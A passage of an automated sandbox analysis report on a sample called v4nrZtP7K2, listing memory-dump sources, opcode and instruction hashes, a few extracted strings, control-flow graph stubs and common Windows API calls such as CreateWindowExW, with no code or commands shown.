                                                                                      • Opcode Fuzzy Hash: b3c9b442e3790dc7c7591193c4bf1f82b4588ea0690c979076cb9707502fb8ac
                                                                                      • Instruction Fuzzy Hash: CDA180B5E052288FEB18CF6AC954B9DBBF2BF89300F14C0AAD409A7251DB745A85CF51
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0^V7
                                                                                      • API String ID: 0-3809573850
                                                                                      • Opcode ID: 6ccc498bfbdcd7a0bf91ea265244690e9aa6b5834f54df84e19a43a8e4f87cc6
                                                                                      • Instruction ID: 8b8dc64e04fe5e3364eb39471bcab0bd53ec5304cff380a15b00e0f68d300e62
                                                                                      • Opcode Fuzzy Hash: 6ccc498bfbdcd7a0bf91ea265244690e9aa6b5834f54df84e19a43a8e4f87cc6
                                                                                      • Instruction Fuzzy Hash: C8A192B5E052188FEB18CF6AC994B9DBBF2BF89300F14C0AAD408B7255DB745A85CF51
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0^V7
                                                                                      • API String ID: 0-3809573850
                                                                                      • Opcode ID: c4c81568b23f4da800ce9b0ad8071e1a17c61381af2654fca6ff70ce9e1b0cb6
                                                                                      • Instruction ID: 17ab01dd312a7d415ac007e0f4e3db2cd330b3a972c3547359fa8e577e794043
                                                                                      • Opcode Fuzzy Hash: c4c81568b23f4da800ce9b0ad8071e1a17c61381af2654fca6ff70ce9e1b0cb6
                                                                                      • Instruction Fuzzy Hash: 9DA181B5E052288FEB58CF6AC954B9DBBF2BF89300F14D0AAD408B7255DB345A85CF11
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0^V7
                                                                                      • API String ID: 0-3809573850
                                                                                      • Opcode ID: 6afc6469aa0b4a98ba3fb405af396fa96cd63d0e4096514cc0c672783892262f
                                                                                      • Instruction ID: ef8de3ef5406e8f481b52e6d2a9fd17ab705cf8cf2a95ea06b3916a56f704b8a
                                                                                      • Opcode Fuzzy Hash: 6afc6469aa0b4a98ba3fb405af396fa96cd63d0e4096514cc0c672783892262f
                                                                                      • Instruction Fuzzy Hash: 5CA193B5E052188FEB18CF6AC994B9DBBF2BF89300F14C1AAD408B7255DB345A85CF11
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0^V7
                                                                                      • API String ID: 0-3809573850
                                                                                      • Opcode ID: c414ef8b96742d680ee90fe60ffcd2dd5757aaa736b3eda4b6b5e92e433c1cb6
                                                                                      • Instruction ID: dd94b3c8e3f4e108b84663612c377a5feb53d10a18a115a2dff09b13b0b38354
                                                                                      • Opcode Fuzzy Hash: c414ef8b96742d680ee90fe60ffcd2dd5757aaa736b3eda4b6b5e92e433c1cb6
                                                                                      • Instruction Fuzzy Hash: CC8186B5E046188FEB18CF6AC954B9AFBF2AF89300F14C1EAD40CA7255DB345A85CF51
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0^V7
                                                                                      • API String ID: 0-3809573850
                                                                                      • Opcode ID: dfe1085432b975db15287aaea28fdbaf39cc15b59b07d36160076084c317cad9
                                                                                      • Instruction ID: c2f5b3d7419d72d9545891bce7c0dbe7fedf5449fa6b3ae1c16ee5512490cbec
                                                                                      • Opcode Fuzzy Hash: dfe1085432b975db15287aaea28fdbaf39cc15b59b07d36160076084c317cad9
                                                                                      • Instruction Fuzzy Hash: 607193B5E006288FEB58CF6AC954B99BBF2AF88300F14C1AAD40CA7255DB345A85CF11
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915107000.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_d0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0cff3abf9721c46ddfb53af1f6445525a6c468afa8190698384798450a66ed51
                                                                                      • Instruction ID: 5d9dfbe2651f661eed738b72fd1617486b2ec952b769806e6354a987abc51a56
                                                                                      • Opcode Fuzzy Hash: 0cff3abf9721c46ddfb53af1f6445525a6c468afa8190698384798450a66ed51
                                                                                      • Instruction Fuzzy Hash: C5A25E71A04309DFCB15CFA8D894AAEBBF2BF89310F15856AE4059B361D731ED41CBA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2948196954.0000000037A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37a30000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 59e8a521cc26b19cea161a75f59c58276e7998627a36d39c8e41ff8d6d85e81d
                                                                                      • Instruction ID: b54243e4639cd01ed87af63b16c117a717a0109ef8a16aa6ae190da4dea9e91a
                                                                                      • Opcode Fuzzy Hash: 59e8a521cc26b19cea161a75f59c58276e7998627a36d39c8e41ff8d6d85e81d
                                                                                      • Instruction Fuzzy Hash: F882C674A01228CFDB25DF64D994BE9BBB2FF89701F1081A9D80967364CB31AE81DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 35099b1faf063d241d5f4b60cf13afc67e67d54f6f2ea4c0cbdd00ba54722c6b
                                                                                      • Instruction ID: 700b7b27aaa2cc30929d4dee91bb97f16ce4ac138e29b6ab1eb213a7a224ca7c
                                                                                      • Opcode Fuzzy Hash: 35099b1faf063d241d5f4b60cf13afc67e67d54f6f2ea4c0cbdd00ba54722c6b
                                                                                      • Instruction Fuzzy Hash: 2272B474A01228CFDB25DF64D994BE9BBB2FB89701F1081E9D40967364CB31AE82DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b12ee37b5b53670d77a31cc0637e357e81ce1c8e49f219caebc7b0d18556e214
                                                                                      • Instruction ID: 07928d17a0840599957865359124604341fc647bc4b73d903e9a5ba755c7a083
                                                                                      • Opcode Fuzzy Hash: b12ee37b5b53670d77a31cc0637e357e81ce1c8e49f219caebc7b0d18556e214
                                                                                      • Instruction Fuzzy Hash: 23827E74E012688FEB64DF65DD98BDDBBB2BB89310F1081EA940DA7261DB305E81DF44
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9cdf8ae4ce56d19ef946ca128df05c01df89cad8243fbd8e046ca6736cb9c61c
                                                                                      • Instruction ID: 1127fff7491e939e8986f2a65c356893e3dca5591e366ee73e4abdc55e45e952
                                                                                      • Opcode Fuzzy Hash: 9cdf8ae4ce56d19ef946ca128df05c01df89cad8243fbd8e046ca6736cb9c61c
                                                                                      • Instruction Fuzzy Hash: C872D174E052298FEB64DF69C894BDDBBB2BB49300F5091EAD409A7351DB34AE81CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915107000.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_d0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a3f2053eae48620f2bb1d779d2f09c6fd0d347934cdba4924d26df84fbe3004a
                                                                                      • Instruction ID: 8f7a23924df4bb08c0e8309f3d7f3f19ef78f2535cc0ecb5156a2bd8e76147ef
                                                                                      • Opcode Fuzzy Hash: a3f2053eae48620f2bb1d779d2f09c6fd0d347934cdba4924d26df84fbe3004a
                                                                                      • Instruction Fuzzy Hash: FF122F30A00219DFDB54CFA9D994AAEBBF2BF49314F15806AE415AB361D732DD41CF60
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915107000.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_d0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: db7706996a49fa43cff7308af087ae815950a37fcfc34459afd40aeace065b2b
                                                                                      • Instruction ID: 9034cfb66c8cd4ff5f6927e162fe47478fe26d3250c8434ce512a22e835e30db
                                                                                      • Opcode Fuzzy Hash: db7706996a49fa43cff7308af087ae815950a37fcfc34459afd40aeace065b2b
                                                                                      • Instruction Fuzzy Hash: CA124830A003099FCB54CF69D994AAEBBF2BF49314F15855AE845EB361DB32ED41CB60
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2946301304.0000000036940000.00000040.00000800.00020000.00000000.sdmp, Offset: 36940000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_36940000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c8a48dfb3a8103b01724f043a55f5bead592415c75504270dd1a2ae518d8d3db
                                                                                      • Instruction ID: 98b11344d14becda6131263cb2d1b37bdcd5c555982fe228ffe5d3f4163b42fa
                                                                                      • Opcode Fuzzy Hash: c8a48dfb3a8103b01724f043a55f5bead592415c75504270dd1a2ae518d8d3db
                                                                                      • Instruction Fuzzy Hash: 5DE1D074E01218CFEB15DFA5D984BDDBBB2BF89300F2081AAD409AB391DB355A85CF15
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2946301304.0000000036940000.00000040.00000800.00020000.00000000.sdmp, Offset: 36940000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_36940000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c8cbc73f02cbf646320366cf4611b7a9ae3302935337b91d6c5008770bd4467c
                                                                                      • Instruction ID: 1ee7723a597cd617f57ce57b86860dee23d9cdda781af8659d1f5b330505b4de
                                                                                      • Opcode Fuzzy Hash: c8cbc73f02cbf646320366cf4611b7a9ae3302935337b91d6c5008770bd4467c
                                                                                      • Instruction Fuzzy Hash: D8D1B274E00218CFEB54DFA5D994B9DBBB2BF89300F2081A9D809AB355DB355E86CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7d58ec82bcea68a16043d7b5aff888190b079095c0f81097662a79d6aa166001
                                                                                      • Instruction ID: 957f4792718183989cdca03f313cd4440c29ddd8afec64c35fb58c7c222161d3
                                                                                      • Opcode Fuzzy Hash: 7d58ec82bcea68a16043d7b5aff888190b079095c0f81097662a79d6aa166001
                                                                                      • Instruction Fuzzy Hash: 72C1B174E00218CFEB14DFA5D994B9DBBB2BF89310F2081A9D409AB355DB35AE85CF11
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2946301304.0000000036940000.00000040.00000800.00020000.00000000.sdmp, Offset: 36940000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_36940000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b72eddc2d18d5a53ea381be4bd5c716c4f4f06f01f0a2ec8f7768da469b83424
                                                                                      • Instruction ID: 109507f54f34d971834e5b69f59827cbd5cf8f75c8fdcb56f037b3db24eb3d9a
                                                                                      • Opcode Fuzzy Hash: b72eddc2d18d5a53ea381be4bd5c716c4f4f06f01f0a2ec8f7768da469b83424
                                                                                      • Instruction Fuzzy Hash: 08A11774D00208CFEB10DFA9C984BDDBBB1FF89314F20826AE409AB291DB749985CF55
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2946301304.0000000036940000.00000040.00000800.00020000.00000000.sdmp, Offset: 36940000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_36940000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0774f59a3b0c5f04efe3838a1e5e486d745bb50d15245ca884ebea48eba45ae5
                                                                                      • Instruction ID: 3010ab9da11256d2d04b3c9f405d3572a2ba747cace4615b72c4358ad46f78d2
                                                                                      • Opcode Fuzzy Hash: 0774f59a3b0c5f04efe3838a1e5e486d745bb50d15245ca884ebea48eba45ae5
                                                                                      • Instruction Fuzzy Hash: 7DA10474D00208CFEB10DFA9C984BDDBBB1BF89314F20826AE509AB291DB759985CF55
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2946301304.0000000036940000.00000040.00000800.00020000.00000000.sdmp, Offset: 36940000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_36940000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4d5e8a4f019f41535dec14fab61f54d920895b8033f64df6a3e7bd80c815a9be
                                                                                      • Instruction ID: 35e55a0f5aa7fa035ab49de8d9a87102b08d74d22a82b805a9c2c82c4ca30100
                                                                                      • Opcode Fuzzy Hash: 4d5e8a4f019f41535dec14fab61f54d920895b8033f64df6a3e7bd80c815a9be
                                                                                      • Instruction Fuzzy Hash: 9A91F374D00318CFEB10DFA9C984B9CBBB1FF49314F2082AAE509AB291DB759985CF55
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915107000.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_d0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e16371384491d9dfcac37056db22031af22371c3c717f8dd0abc34b6c8a444c8
                                                                                      • Instruction ID: 2af5a4ae130501cc39667fec0b44e3bccdf53ee41f1ec78354812b23f63319bb
                                                                                      • Opcode Fuzzy Hash: e16371384491d9dfcac37056db22031af22371c3c717f8dd0abc34b6c8a444c8
                                                                                      • Instruction Fuzzy Hash: 8E91B274E00218DFEB54DFA9D884A9DBBF2BF89310F14C16AE409AB365DB309985CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b500449c141bd2713f9e71ec953bfdbe30dc98573d28b63a1448c8b0a18dc150
                                                                                      • Instruction ID: a39d0e3a9a846267a82131d0c453253cf9a047e8377f075bbbbc47dc15085815
                                                                                      • Opcode Fuzzy Hash: b500449c141bd2713f9e71ec953bfdbe30dc98573d28b63a1448c8b0a18dc150
                                                                                      • Instruction Fuzzy Hash: E681F574E00208CBEB08DFAAD95069DBBF2BF89314F64C12AD418AB355DB355942CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c647142dc1bfa4d3f5feb5f36568fe426b9625d6ceb5bad12cbbb8347ca0d8e0
                                                                                      • Instruction ID: 537287010d5089dbfb3ca194f3b1394429562b6dc92e9ff1dde124f975309090
                                                                                      • Opcode Fuzzy Hash: c647142dc1bfa4d3f5feb5f36568fe426b9625d6ceb5bad12cbbb8347ca0d8e0
                                                                                      • Instruction Fuzzy Hash: 7D71C775D05218CFDB68CF66D9947DDBBF2BF89300F1090AAD408A7250DB35AA82CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e6ce4d589ea5658578080d27ee59a5ad229bb0bcfc99e9eddd4dc653dab6e4b1
                                                                                      • Instruction ID: d2a48ff4b755e2b2a0452195bfed8e3ed8435d58c4ad861840aab44f9830f1b1
                                                                                      • Opcode Fuzzy Hash: e6ce4d589ea5658578080d27ee59a5ad229bb0bcfc99e9eddd4dc653dab6e4b1
                                                                                      • Instruction Fuzzy Hash: 3D61D934A00258CFEB15DF60D954BADBB72FB88710F10C4AA990A77364DA356D82DF58
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ff17ec4082d7bb13c92b8b9115c03c148f2da6eeb66594d41694a9f2e3e6fb79
                                                                                      • Instruction ID: cbb4bbae6811202e57ac38401c9a0f51a14c21f369cd9936f6b9f8b47f8ee198
                                                                                      • Opcode Fuzzy Hash: ff17ec4082d7bb13c92b8b9115c03c148f2da6eeb66594d41694a9f2e3e6fb79
                                                                                      • Instruction Fuzzy Hash: A9418AB1E056188BEB58CF6BDD547D9FAF3AFC9300F04C1AAC40CA6265DB741A868F50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9237b656d23a8da3178707743159cd556dd2ebd4d7ec47ccfa09a83531da58bc
                                                                                      • Instruction ID: b88283105ca00763aa482242285c8cb827f67ac80022644bbb957168fc23e7a7
                                                                                      • Opcode Fuzzy Hash: 9237b656d23a8da3178707743159cd556dd2ebd4d7ec47ccfa09a83531da58bc
                                                                                      • Instruction Fuzzy Hash: BC4158B1E016188BEB58CF6BCD457DAFAF3AFC8310F04C1AAD50CA6254DB741A868F51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: aebb31b161d2ff35d7ecaefec6f76c8af1ab277c3272202ed4d31447ec5a18e5
                                                                                      • Instruction ID: 11f9f2f221b0cfd91fab1205221ee357265749598fbc6e02063047c2905e98ec
                                                                                      • Opcode Fuzzy Hash: aebb31b161d2ff35d7ecaefec6f76c8af1ab277c3272202ed4d31447ec5a18e5
                                                                                      • Instruction Fuzzy Hash: BB4101B4D05208CBEB08DFAAD8547DDBBF2AF88300F20C12AC418BB259EB355946CF50

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32 ref: 37A309FE
                                                                                      • GetCurrentThread.KERNEL32 ref: 37A30A3B
                                                                                      • GetCurrentProcess.KERNEL32 ref: 37A30A78
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 37A30AD1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2948196954.0000000037A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37a30000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Current$ProcessThread
                                                                                      • String ID:
                                                                                      • API String ID: 2063062207-0
                                                                                      • Opcode ID: 22d539d532519d450f6cce1408a5ad3c8de9affa4034479c5e43d23f1e952a31
                                                                                      • Instruction ID: 9dc5f7c839672cdd018a8186963ecc2f0ed1f3c8330f483eb9f167e24028d62b
                                                                                      • Opcode Fuzzy Hash: 22d539d532519d450f6cce1408a5ad3c8de9affa4034479c5e43d23f1e952a31
                                                                                      • Instruction Fuzzy Hash: 965178B09012099FDB54CFA9D548BDEBBF1AF88310F20845DE459A7351DB34A940CF65

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 131 37607920-37607941 132 37607943 131->132 133 37607948-3760797e 131->133 132->133 136 37607987-376079ae 133->136 138 376079b4-376079cc 136->138 139 37607b3d-37607b46 136->139 142 37607ae8-37607b03 138->142 144 376079d1-37607ae7 142->144 145 37607b09-37607b2d 142->145 144->142 145->139
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: <CV7$<CV7$<CV7
                                                                                      • API String ID: 0-1513090091
                                                                                      • Opcode ID: 2091af65e261ee14cc206b6ede5191e73ac2c620ab9bbc8ae9c4035fc7554c99
                                                                                      • Instruction ID: 050b1290a1aa809badd45b9a58e37509fcc9717e577983ec4d21430595b8c6e4
                                                                                      • Opcode Fuzzy Hash: 2091af65e261ee14cc206b6ede5191e73ac2c620ab9bbc8ae9c4035fc7554c99
                                                                                      • Instruction Fuzzy Hash: 4E51F174D01318CFDB14DFA5D954BAEBBB2BF88310F208129D805AB254DB356A46DF44

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1055 3760d548-3760d66d 1074 3760d710-3760d741 call 3760dd21 1055->1074 1075 3760d673-3760d6b9 1055->1075 1082 3760d747-3760d75e 1074->1082 1080 3760d6c4-3760d70f 1075->1080 1081 3760d6bb-3760d6bf 1075->1081 1081->1080
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: drV7$)\7
                                                                                      • API String ID: 0-3476427785
                                                                                      • Opcode ID: f0c216e70efc31d833f416289d48af0760bc20b8bfe2a944eb10cf69fb50406a
                                                                                      • Instruction ID: 54ac42b774f8dc05f84546f2a272422534293f790ae4196e7258041c49cf9039
                                                                                      • Opcode Fuzzy Hash: f0c216e70efc31d833f416289d48af0760bc20b8bfe2a944eb10cf69fb50406a
                                                                                      • Instruction Fuzzy Hash: 9D518370A002099FCB05EFA4D955AEEBBF2FF85300F108565E005BB262DB31AE45CF65

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1091 37607922-37607941 1092 37607943 1091->1092 1093 37607948-3760797e 1091->1093 1092->1093 1096 37607987-376079ae 1093->1096 1098 376079b4-376079cc 1096->1098 1099 37607b3d-37607b46 1096->1099 1102 37607ae8-37607b03 1098->1102 1104 376079d1-37607ae7 1102->1104 1105 37607b09-37607b2d 1102->1105 1104->1102 1105->1099
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: <CV7$<CV7
                                                                                      • API String ID: 0-2019076967
                                                                                      • Opcode ID: 933bc1c50b52cdd210e69a746c90d208ab502a7ae123f9952033212c69248bec
                                                                                      • Instruction ID: b32b226867456fb1c739bd621ae98ceca54fc4727f15d9dc250b02228e0f330a
                                                                                      • Opcode Fuzzy Hash: 933bc1c50b52cdd210e69a746c90d208ab502a7ae123f9952033212c69248bec
                                                                                      • Instruction Fuzzy Hash: 1A21F070D06318DFEB08CFA5D4647EEBBB2AF89304F50842AD414BB240DB795A8ADF50

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1819 37a30104-37a30176 1821 37a30181-37a30188 1819->1821 1822 37a30178-37a3017e 1819->1822 1823 37a30193-37a30232 CreateWindowExW 1821->1823 1824 37a3018a-37a30190 1821->1824 1822->1821 1826 37a30234-37a3023a 1823->1826 1827 37a3023b-37a30273 1823->1827 1824->1823 1826->1827 1831 37a30280 1827->1831 1832 37a30275-37a30278 1827->1832 1833 37a30281 1831->1833 1832->1831 1833->1833
                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37A30222
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2948196954.0000000037A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37a30000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateWindow
                                                                                      • String ID:
                                                                                      • API String ID: 716092398-0
                                                                                      • Opcode ID: 787ca4fbcb530b6e02a4b6d145434a140092f1d1adaa0690b1c26dcc51e8289a
                                                                                      • Instruction ID: a72c61aa6195122691cb9ac7c5c7d4a4ad2543712f88a7a33150bb11214ac65b
                                                                                      • Opcode Fuzzy Hash: 787ca4fbcb530b6e02a4b6d145434a140092f1d1adaa0690b1c26dcc51e8289a
                                                                                      • Instruction Fuzzy Hash: 6451D3B5D0134DDFDB14CF99C880ADEBBB6BF48310F24812AE819AB210D7719945CF91

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
